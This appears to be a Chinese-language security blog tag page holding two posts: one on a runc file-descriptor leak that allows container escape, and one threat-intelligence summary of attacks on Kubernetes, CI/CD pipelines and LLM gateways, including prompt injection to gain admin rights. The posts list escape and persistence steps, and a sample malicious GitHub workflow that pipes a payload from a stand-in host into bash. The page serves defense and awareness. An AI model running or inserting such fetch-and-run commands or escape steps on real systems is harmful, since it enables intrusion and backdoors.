2 篇博文 含有标签「Kubernetes」

runc（Docker 和 Kubernetes 的底层容器运行时）近期披露一处文件描述符泄漏漏洞，攻击者可在特定条件下实现容器逃逸，获取宿主机 root 权限。

漏洞背景​

runc 在处理 WORKDIR 指令时，错误地将宿主机文件描述符通过 /proc/self/fd 泄漏至容器命名空间内部。当容器镜像的 Dockerfile 包含特定 WORKDIR 路径构造时，可触发该路径。

攻击路径​

1. 构造恶意 Dockerfile，WORKDIR 指向 /proc/self/fd/N
2. 构建镜像时 runc 未正确关闭继承的 fd
3. 容器启动后，进程可访问宿主机根文件系统
4. 写入 crontab 或 SSH 公钥实现持久化

影响评估​

防御措施​

1. 立即升级 runc 至 1.2.4+
2. 启用 Pod Security Admission 强制 restricted 策略
3. 部署 Falco/Tetragon 进行运行时 fd 异常监控
4. 限制容器内 /proc 文件系统挂载权限

2026 年 Q1 以来，多个 APT 组织显著加大了对云原生基础设施的攻击投入。ICE 实验室威胁情报团队通过长期追踪，识别出以下攻击趋势。

攻击趋势概览​

1. Kubernetes API Server 定向攻击​

多个 APT 组织（包括 Lazarus、Volt Typhoon）开始将目标转向 Kubernetes API Server。主要攻击向量包括：

• 匿名认证滥用：部分集群未禁用匿名请求，攻击者可枚举集群资源
• Service Account Token 窃取：通过 Pod 漏洞获取 SA Token，横向移动至 Master 节点
• etcd 数据泄露：直接访问未加密的 etcd 存储，获取集群全部 Secret

2. CI/CD 供应链投毒​

攻击者通过向 GitHub Actions / GitLab CI 配置文件注入恶意 workflow_dispatch 触发器，在构建阶段植入后门：

# 恶意 workflow 示例
on:
  workflow_dispatch:
    inputs:
      deploy:
        description: 'Deploy to production'
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - run: curl -sL https://evil.com/payload | bash

3. LLM 网关攻击面​

研究发现，针对 One-API、New-API 等 LLM 网关的攻击呈上升趋势：

• 请求走私：利用 HTTP/1.1 与 HTTP/2 解析差异绕过速率限制
• Token 重放：截获 API Token 后批量调用付费模型接口
• Prompt 注入：通过系统提示词注入获取网关管理权限

IoC 指标​

防御建议​

1. 强制启用 Kubernetes 匿名认证禁用
2. 实施 SLSA Level 3 供应链安全框架
3. 部署 eBPF 运行时监控（如 Tetragon）检测异常 syscall
4. 定期审计 LLM 网关 Token 权限与调用日志